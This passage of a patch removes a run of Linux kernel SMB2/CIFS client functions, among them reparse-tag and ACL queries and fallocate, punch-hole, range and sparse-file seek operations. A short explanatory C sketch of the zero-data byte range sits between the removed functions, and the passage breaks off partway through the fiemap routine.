+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	return rc;
+-}
+-
+-int
+-smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifs_sb_info *cifs_sb, const char *full_path,
+-		   __u32 *tag)
+-{
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec close_iov[1];
+-	struct smb2_ioctl_rsp *ioctl_rsp;
+-	struct reparse_data_buffer *reparse_buf;
+-	u32 plen;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	/*
+-	 * setup smb2open - TODO add optimization to call cifs_get_readable_path
+-	 * to see if there is a handle already open that we can use
+-	 */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto query_rp_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-
+-	/* IOCTL */
+-	memset(&io_iov, 0, sizeof(io_iov));
+-	rqst[1].rq_iov = io_iov;
+-	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-	rc = SMB2_ioctl_init(tcon, server,
+-			     &rqst[1], COMPOUND_FID,
+-			     COMPOUND_FID, FSCTL_GET_REPARSE_POINT, NULL, 0,
+-			     CIFSMaxBufSize -
+-			     MAX_SMB2_CREATE_RESPONSE_SIZE -
+-			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
+-	if (rc)
+-		goto query_rp_exit;
+-
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-
+-	/* Close */
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto query_rp_exit;
+-
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, tcon->ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-
+-	ioctl_rsp = rsp_iov[1].iov_base;
+-
+-	/*
+-	 * Open was successful and we got an ioctl response.
+-	 */
+-	if (rc == 0) {
+-		/* See MS-FSCC 2.3.23 */
+-
+-		reparse_buf = (struct reparse_data_buffer *)
+-			((char *)ioctl_rsp +
+-			 le32_to_cpu(ioctl_rsp->OutputOffset));
+-		plen = le32_to_cpu(ioctl_rsp->OutputCount);
+-
+-		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
+-		    rsp_iov[1].iov_len) {
+-			cifs_tcon_dbg(FYI, "srv returned invalid ioctl len: %d\n",
+-				 plen);
+-			rc = -EIO;
+-			goto query_rp_exit;
+-		}
+-		*tag = le32_to_cpu(reparse_buf->ReparseTag);
+-	}
+-
+- query_rp_exit:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_ioctl_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	return rc;
+-}
+-
+-static struct cifs_ntsd *
+-get_smb2_acl_by_fid(struct cifs_sb_info *cifs_sb,
+-		    const struct cifs_fid *cifsfid, u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	unsigned int xid;
+-	int rc = -EOPNOTSUPP;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	xid = get_xid();
+-	cifs_dbg(FYI, "trying to get acl\n");
+-
+-	rc = SMB2_query_acl(xid, tlink_tcon(tlink), cifsfid->persistent_fid,
+-			    cifsfid->volatile_fid, (void **)&pntsd, pacllen,
+-			    info);
+-	free_xid(xid);
+-
+-	cifs_put_tlink(tlink);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-
+-}
+-
+-static struct cifs_ntsd *
+-get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+-		     const char *path, u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	unsigned int xid;
+-	int rc;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	__le16 *utf16_path;
+-
+-	cifs_dbg(FYI, "get smb3 acl for path %s\n", path);
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		free_xid(xid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = READ_CONTROL,
+-		.disposition = FILE_OPEN,
+-		/*
+-		 * When querying an ACL, even if the file is a symlink
+-		 * we want to open the source not the target, and so
+-		 * the protocol requires that the client specify this
+-		 * flag when opening a reparse point
+-		 */
+-		.create_options = cifs_create_options(cifs_sb, 0) |
+-				  OPEN_REPARSE_POINT,
+-		.fid = &fid,
+-	};
+-
+-	if (info & SACL_SECINFO)
+-		oparms.desired_access |= SYSTEM_SECURITY;
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+-		       NULL);
+-	kfree(utf16_path);
+-	if (!rc) {
+-		rc = SMB2_query_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
+-				    fid.volatile_fid, (void **)&pntsd, pacllen,
+-				    info);
+-		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-}
+-
+-static int
+-set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+-		struct inode *inode, const char *path, int aclflag)
+-{
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	unsigned int xid;
+-	int rc, access_flags = 0;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	__le16 *utf16_path;
+-
+-	cifs_dbg(FYI, "set smb3 acl for path %s\n", path);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	if (aclflag & CIFS_ACL_OWNER || aclflag & CIFS_ACL_GROUP)
+-		access_flags |= WRITE_OWNER;
+-	if (aclflag & CIFS_ACL_SACL)
+-		access_flags |= SYSTEM_SECURITY;
+-	if (aclflag & CIFS_ACL_DACL)
+-		access_flags |= WRITE_DAC;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.desired_access = access_flags,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	kfree(utf16_path);
+-	if (!rc) {
+-		rc = SMB2_set_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
+-			    fid.volatile_fid, pnntsd, acllen, aclflag);
+-		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/* Retrieve an ACL from the server */
+-static struct cifs_ntsd *
+-get_smb2_acl(struct cifs_sb_info *cifs_sb,
+-	     struct inode *inode, const char *path,
+-	     u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	struct cifsFileInfo *open_file = NULL;
+-
+-	if (inode && !(info & SACL_SECINFO))
+-		open_file = find_readable_file(CIFS_I(inode), true);
+-	if (!open_file || (info & SACL_SECINFO))
+-		return get_smb2_acl_by_path(cifs_sb, path, pacllen, info);
+-
+-	pntsd = get_smb2_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
+-	cifsFileInfo_put(open_file);
+-	return pntsd;
+-}
+-
+-static long smb3_zero_data(struct file *file, struct cifs_tcon *tcon,
+-			     loff_t offset, loff_t len, unsigned int xid)
+-{
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct file_zero_data_information fsctl_buf;
+-
+-	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
+-
+-	fsctl_buf.FileOffset = cpu_to_le64(offset);
+-	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
+-
+-	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			  cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
+-			  (char *)&fsctl_buf,
+-			  sizeof(struct file_zero_data_information),
+-			  0, NULL, NULL);
+-}
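
/*
 * FSCTL_SET_ZERO_DATA, as used above, takes a half-open interval:
 * FileOffset is the first byte to zero and BeyondFinalZero is the
 * first byte left untouched, hence the offset + len endpoint. The
 * endpoint math as a sketch (struct and helper names illustrative):
 */
#include <stdint.h>

struct zero_range {
	uint64_t start;		/* first byte zeroed */
	uint64_t end_excl;	/* first byte NOT zeroed */
};

static inline struct zero_range make_zero_range(uint64_t offset,
						uint64_t len)
{
	return (struct zero_range){ offset, offset + len };
}
/* zeroing 100 bytes at offset 4096 yields [4096, 4196) */
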
+-
+-static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t offset, loff_t len, bool keep_size)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct inode *inode = file_inode(file);
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct cifsFileInfo *cfile = file->private_data;
+-	long rc;
+-	unsigned int xid;
+-	__le64 eof;
+-
+-	xid = get_xid();
+-
+-	trace_smb3_zero_enter(xid, cfile->fid.persistent_fid, tcon->tid,
+-			      ses->Suid, offset, len);
+-
+-	inode_lock(inode);
+-	filemap_invalidate_lock(inode->i_mapping);
+-
+-	/*
+-	 * We zero the range through ioctl, so we need to remove the page caches
+-	 * first, otherwise the data may be inconsistent with the server.
+-	 */
+-	truncate_pagecache_range(inode, offset, offset + len - 1);
+-
+-	/* if file not oplocked can't be sure whether asking to extend size */
+-	rc = -EOPNOTSUPP;
+-	if (keep_size == false && !CIFS_CACHE_READ(cifsi))
+-		goto zero_range_exit;
+-
+-	rc = smb3_zero_data(file, tcon, offset, len, xid);
+-	if (rc < 0)
+-		goto zero_range_exit;
+-
+-	/*
+-	 * do we also need to change the size of the file?
+-	 */
+-	if (keep_size == false && i_size_read(inode) < offset + len) {
+-		eof = cpu_to_le64(offset + len);
+-		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-				  cfile->fid.volatile_fid, cfile->pid, &eof);
+-	}
+-
+- zero_range_exit:
+-	filemap_invalidate_unlock(inode->i_mapping);
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	if (rc)
+-		trace_smb3_zero_err(xid, cfile->fid.persistent_fid, tcon->tid,
+-			      ses->Suid, offset, len, rc);
+-	else
+-		trace_smb3_zero_done(xid, cfile->fid.persistent_fid, tcon->tid,
+-			      ses->Suid, offset, len);
+-	return rc;
+-}
+-
+-static long smb3_punch_hole(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t offset, loff_t len)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct file_zero_data_information fsctl_buf;
+-	long rc;
+-	unsigned int xid;
+-	__u8 set_sparse = 1;
+-
+-	xid = get_xid();
+-
+-	inode_lock(inode);
+-	/* Need to make file sparse, if not already, before freeing range. */
+-	/* Consider adding equivalent for compressed since it could also work */
+-	if (!smb2_set_sparse(xid, tcon, cfile, inode, set_sparse)) {
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	filemap_invalidate_lock(inode->i_mapping);
+-	/*
+-	 * We implement the punch hole through ioctl, so we need to remove the page
+-	 * caches first, otherwise the data may be inconsistent with the server.
+-	 */
+-	truncate_pagecache_range(inode, offset, offset + len - 1);
+-
+-	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
+-
+-	fsctl_buf.FileOffset = cpu_to_le64(offset);
+-	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
+-			(char *)&fsctl_buf,
+-			sizeof(struct file_zero_data_information),
+-			CIFSMaxBufSize, NULL, NULL);
+-	filemap_invalidate_unlock(inode->i_mapping);
+-out:
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int smb3_simple_fallocate_write_range(unsigned int xid,
+-					     struct cifs_tcon *tcon,
+-					     struct cifsFileInfo *cfile,
+-					     loff_t off, loff_t len,
+-					     char *buf)
+-{
+-	struct cifs_io_parms io_parms = {0};
+-	int nbytes;
+-	int rc = 0;
+-	struct kvec iov[2];
+-
+-	io_parms.netfid = cfile->fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.persistent_fid = cfile->fid.persistent_fid;
+-	io_parms.volatile_fid = cfile->fid.volatile_fid;
+-
+-	while (len) {
+-		io_parms.offset = off;
+-		io_parms.length = len;
+-		if (io_parms.length > SMB2_MAX_BUFFER_SIZE)
+-			io_parms.length = SMB2_MAX_BUFFER_SIZE;
+-		/* iov[0] is reserved for smb header */
+-		iov[1].iov_base = buf;
+-		iov[1].iov_len = io_parms.length;
+-		rc = SMB2_write(xid, &io_parms, &nbytes, iov, 1);
+-		if (rc)
+-			break;
+-		if (nbytes > len)
+-			return -EINVAL;
+-		buf += nbytes;
+-		off += nbytes;
+-		len -= nbytes;
+-	}
+-	return rc;
+-}
+-
+-static int smb3_simple_fallocate_range(unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifsFileInfo *cfile,
+-				       loff_t off, loff_t len)
+-{
+-	struct file_allocated_range_buffer in_data, *out_data = NULL, *tmp_data;
+-	u32 out_data_len;
+-	char *buf = NULL;
+-	loff_t l;
+-	int rc;
+-
+-	in_data.file_offset = cpu_to_le64(off);
+-	in_data.length = cpu_to_le64(len);
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_QUERY_ALLOCATED_RANGES,
+-			(char *)&in_data, sizeof(in_data),
+-			1024 * sizeof(struct file_allocated_range_buffer),
+-			(char **)&out_data, &out_data_len);
+-	if (rc)
+-		goto out;
+-
+-	buf = kzalloc(1024 * 1024, GFP_KERNEL);
+-	if (buf == NULL) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	tmp_data = out_data;
+-	while (len) {
+-		/*
+-		 * The rest of the region is unmapped so write it all.
+-		 */
+-		if (out_data_len == 0) {
+-			rc = smb3_simple_fallocate_write_range(xid, tcon,
+-					       cfile, off, len, buf);
+-			goto out;
+-		}
+-
+-		if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
+-			rc = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (off < le64_to_cpu(tmp_data->file_offset)) {
+-			/*
+-			 * We are at a hole. Write until the end of the region
+-			 * or until the next allocated data,
+-			 * whichever comes next.
+-			 */
+-			l = le64_to_cpu(tmp_data->file_offset) - off;
+-			if (len < l)
+-				l = len;
+-			rc = smb3_simple_fallocate_write_range(xid, tcon,
+-					       cfile, off, l, buf);
+-			if (rc)
+-				goto out;
+-			off = off + l;
+-			len = len - l;
+-			if (len == 0)
+-				goto out;
+-		}
+-		/*
+-		 * We are at a section of allocated data, just skip forward
+-		 * until the end of the data or the end of the region
+-		 * we are supposed to fallocate, whichever comes first.
+-		 */
+-		l = le64_to_cpu(tmp_data->length);
+-		if (len < l)
+-			l = len;
+-		off += l;
+-		len -= l;
+-
+-		tmp_data = &tmp_data[1];
+-		out_data_len -= sizeof(struct file_allocated_range_buffer);
+-	}
+-
+- out:
+-	kfree(out_data);
+-	kfree(buf);
+-	return rc;
+-}
+-
+-
+-static long smb3_simple_falloc(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t off, loff_t len, bool keep_size)
+-{
+-	struct inode *inode;
+-	struct cifsInodeInfo *cifsi;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	long rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	__le64 eof;
+-
+-	xid = get_xid();
+-
+-	inode = d_inode(cfile->dentry);
+-	cifsi = CIFS_I(inode);
+-
+-	trace_smb3_falloc_enter(xid, cfile->fid.persistent_fid, tcon->tid,
+-				tcon->ses->Suid, off, len);
+-	/* if file not oplocked can't be sure whether asking to extend size */
+-	if (!CIFS_CACHE_READ(cifsi))
+-		if (keep_size == false) {
+-			trace_smb3_falloc_err(xid, cfile->fid.persistent_fid,
+-				tcon->tid, tcon->ses->Suid, off, len, rc);
+-			free_xid(xid);
+-			return rc;
+-		}
+-
+-	/*
+-	 * Extending the file
+-	 */
+-	if ((keep_size == false) && i_size_read(inode) < off + len) {
+-		rc = inode_newsize_ok(inode, off + len);
+-		if (rc)
+-			goto out;
+-
+-		if (cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)
+-			smb2_set_sparse(xid, tcon, cfile, inode, false);
+-
+-		eof = cpu_to_le64(off + len);
+-		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-				  cfile->fid.volatile_fid, cfile->pid, &eof);
+-		if (rc == 0) {
+-			cifsi->server_eof = off + len;
+-			cifs_setsize(inode, off + len);
+-			cifs_truncate_page(inode->i_mapping, inode->i_size);
+-			truncate_setsize(inode, off + len);
+-		}
+-		goto out;
+-	}
+-
+-	/*
+-	 * Files are non-sparse by default, so falloc may be a no-op.
+-	 * Must check whether the file is sparse. If not sparse, and since
+-	 * we are not extending, there is no need to do anything since the
+-	 * file is already allocated.
+-	 */
+-	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) == 0) {
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	if (keep_size == true) {
+-		/*
+-		 * We can not preallocate pages beyond the end of the file
+-		 * in SMB2
+-		 */
+-		if (off >= i_size_read(inode)) {
+-			rc = 0;
+-			goto out;
+-		}
+-		/*
+-		 * For fallocates that are partially beyond the end of file,
+-		 * clamp len so we only fallocate up to the end of file.
+-		 */
+-		if (off + len > i_size_read(inode)) {
+-			len = i_size_read(inode) - off;
+-		}
+-	}
+-
+-	if ((keep_size == true) || (i_size_read(inode) >= off + len)) {
+-		/*
+-		 * At this point, we are trying to fallocate an internal
+-		 * region of a sparse file. Since smb2 does not have a
+-		 * fallocate command we have two options for emulating this.
+-		 * We can either turn the entire file non-sparse, which
+-		 * we only do if the fallocate is for virtually the whole
+-		 * file, or we can overwrite the region with zeroes using
+-		 * SMB2_write, which could be prohibitively expensive
+-		 * if len is large.
+-		 */
+-		/*
+-		 * We are only trying to fallocate a small region so
+-		 * just write it with zero.
+-		 */
+-		if (len <= 1024 * 1024) {
+-			rc = smb3_simple_fallocate_range(xid, tcon, cfile,
+-							 off, len);
+-			goto out;
+-		}
+-
+-		/*
+-		 * Check if falloc starts within first few pages of file
+-		 * and ends within a few pages of the end of file to
+-		 * ensure that most of file is being forced to be
+-		 * fallocated now. If so then setting whole file sparse
+-		 * ie potentially making a few extra pages at the beginning
+-		 * or end of the file non-sparse via set_sparse is harmless.
+-		 */
+-		if ((off > 8192) || (off + len + 8192 < i_size_read(inode))) {
+-			rc = -EOPNOTSUPP;
+-			goto out;
+-		}
+-	}
+-
+-	smb2_set_sparse(xid, tcon, cfile, inode, false);
+-	rc = 0;
+-
+-out:
+-	if (rc)
+-		trace_smb3_falloc_err(xid, cfile->fid.persistent_fid, tcon->tid,
+-				tcon->ses->Suid, off, len, rc);
+-	else
+-		trace_smb3_falloc_done(xid, cfile->fid.persistent_fid, tcon->tid,
+-				tcon->ses->Suid, off, len);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static long smb3_collapse_range(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t off, loff_t len)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct inode *inode = file_inode(file);
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	__le64 eof;
+-	loff_t old_eof;
+-
+-	xid = get_xid();
+-
+-	inode_lock(inode);
+-
+-	old_eof = i_size_read(inode);
+-	if ((off >= old_eof) ||
+-	    off + len >= old_eof) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	filemap_invalidate_lock(inode->i_mapping);
+-	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof - 1);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	truncate_pagecache_range(inode, off, old_eof);
+-
+-	rc = smb2_copychunk_range(xid, cfile, cfile, off + len,
+-				  old_eof - off - len, off);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	eof = cpu_to_le64(old_eof - len);
+-	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-			  cfile->fid.volatile_fid, cfile->pid, &eof);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = 0;
+-
+-	cifsi->server_eof = i_size_read(inode) - len;
+-	truncate_setsize(inode, cifsi->server_eof);
+-	fscache_resize_cookie(cifs_inode_cookie(inode), cifsi->server_eof);
+-out_2:
+-	filemap_invalidate_unlock(inode->i_mapping);
+- out:
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static long smb3_insert_range(struct file *file, struct cifs_tcon *tcon,
+-			      loff_t off, loff_t len)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct inode *inode = file_inode(file);
+-	__le64 eof;
+-	__u64  count, old_eof;
+-
+-	xid = get_xid();
+-
+-	inode_lock(inode);
+-
+-	old_eof = i_size_read(inode);
+-	if (off >= old_eof) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	count = old_eof - off;
+-	eof = cpu_to_le64(old_eof + len);
+-
+-	filemap_invalidate_lock(inode->i_mapping);
+-	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof + len - 1);
+-	if (rc < 0)
+-		goto out_2;
+-	truncate_pagecache_range(inode, off, old_eof);
+-
+-	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-			  cfile->fid.volatile_fid, cfile->pid, &eof);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = smb2_copychunk_range(xid, cfile, cfile, off, count, off + len);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = smb3_zero_data(file, tcon, off, len, xid);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = 0;
+-out_2:
+-	filemap_invalidate_unlock(inode->i_mapping);
+- out:
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static loff_t smb3_llseek(struct file *file, struct cifs_tcon *tcon, loff_t offset, int whence)
+-{
+-	struct cifsFileInfo *wrcfile, *cfile = file->private_data;
+-	struct cifsInodeInfo *cifsi;
+-	struct inode *inode;
+-	int rc = 0;
+-	struct file_allocated_range_buffer in_data, *out_data = NULL;
+-	u32 out_data_len;
+-	unsigned int xid;
+-
+-	if (whence != SEEK_HOLE && whence != SEEK_DATA)
+-		return generic_file_llseek(file, offset, whence);
+-
+-	inode = d_inode(cfile->dentry);
+-	cifsi = CIFS_I(inode);
+-
+-	if (offset < 0 || offset >= i_size_read(inode))
+-		return -ENXIO;
+-
+-	xid = get_xid();
+-	/*
+-	 * We need to be sure that all dirty pages are written as they
+-	 * might fill holes on the server.
+-	 * Note that we also MUST flush any written pages since at least
+-	 * some servers (Windows2016) will not reflect recent writes in
+-	 * QUERY_ALLOCATED_RANGES until SMB2_flush is called.
+-	 */
+-	wrcfile = find_writable_file(cifsi, FIND_WR_ANY);
+-	if (wrcfile) {
+-		filemap_write_and_wait(inode->i_mapping);
+-		smb2_flush_file(xid, tcon, &wrcfile->fid);
+-		cifsFileInfo_put(wrcfile);
+-	}
+-
+-	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)) {
+-		if (whence == SEEK_HOLE)
+-			offset = i_size_read(inode);
+-		goto lseek_exit;
+-	}
+-
+-	in_data.file_offset = cpu_to_le64(offset);
+-	in_data.length = cpu_to_le64(i_size_read(inode));
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_QUERY_ALLOCATED_RANGES,
+-			(char *)&in_data, sizeof(in_data),
+-			sizeof(struct file_allocated_range_buffer),
+-			(char **)&out_data, &out_data_len);
+-	if (rc == -E2BIG)
+-		rc = 0;
+-	if (rc)
+-		goto lseek_exit;
+-
+-	if (whence == SEEK_HOLE && out_data_len == 0)
+-		goto lseek_exit;
+-
+-	if (whence == SEEK_DATA && out_data_len == 0) {
+-		rc = -ENXIO;
+-		goto lseek_exit;
+-	}
+-
+-	if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
+-		rc = -EINVAL;
+-		goto lseek_exit;
+-	}
+-	if (whence == SEEK_DATA) {
+-		offset = le64_to_cpu(out_data->file_offset);
+-		goto lseek_exit;
+-	}
+-	if (offset < le64_to_cpu(out_data->file_offset))
+-		goto lseek_exit;
+-
+-	offset = le64_to_cpu(out_data->file_offset) + le64_to_cpu(out_data->length);
+-
+- lseek_exit:
+-	free_xid(xid);
+-	kfree(out_data);
+-	if (!rc)
+-		return vfs_setpos(file, offset, inode->i_sb->s_maxbytes);
+-	else
+-		return rc;
+-}
+-
+-static int smb3_fiemap(struct cifs_tcon *tcon,
+-		       struct cifsFileInfo *cfile,
+-		       struct fiemap_extent_info *fei, u64 start, u64 len)
+-{
+-	unsigned int xid;
+-	struct file_allocated_range_buffer in_data, *out_data;
+-	u32 out_data_len;
+-	int i, num, rc, flags, last_blob;
+-	u64 next;
+-
+-	rc = fiemap_prep(d_inode(cfile->dentry), fei, start, &len, 0);
+-	if (rc)
+-		return rc;
+-
+-	xid = get_xid();
+- again:
+-	in_data.file_offset = cpu_to_le64(start);
+-	in_data.length = cpu_to_le64(len);
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_QUERY_ALLOCATED_RANGES,
+-			(char *)&in_data, sizeof(in_data),
+-			1024 * sizeof(struct file_allocated_range_buffer),
+-			(char **)&out_data, &out_data_len);
+-	if (rc == -E2BIG) {
+-		last_blob = 0;
+-		rc = 0;
+-	} else
+-		last_blob = 1;
+-	if (rc)
+-		goto out;
+-
+-	if (out_data_len && out_data_len < sizeof(struct file_allocated_range_buffer)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	if (out_data_len % sizeof(struct file_allocated_range_buffer)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	num = out_data_len / sizeof(struct file_allocated_range_buffer);
+-	for (i = 0; i < num; i++) {
+-		flags = 0;
+-		if (i == num - 1 && last_blob)
+-			flags |= FIEMAP_EXTENT_LAST;
+-
+-		rc = fiemap_fill_next_extent(fei,
+-				le64_to_cpu(out_data[i].file_offset),
+-				le64_to_cpu(out_data[i].file_offset),
+-				le64_to_cpu(out_data[i].length),
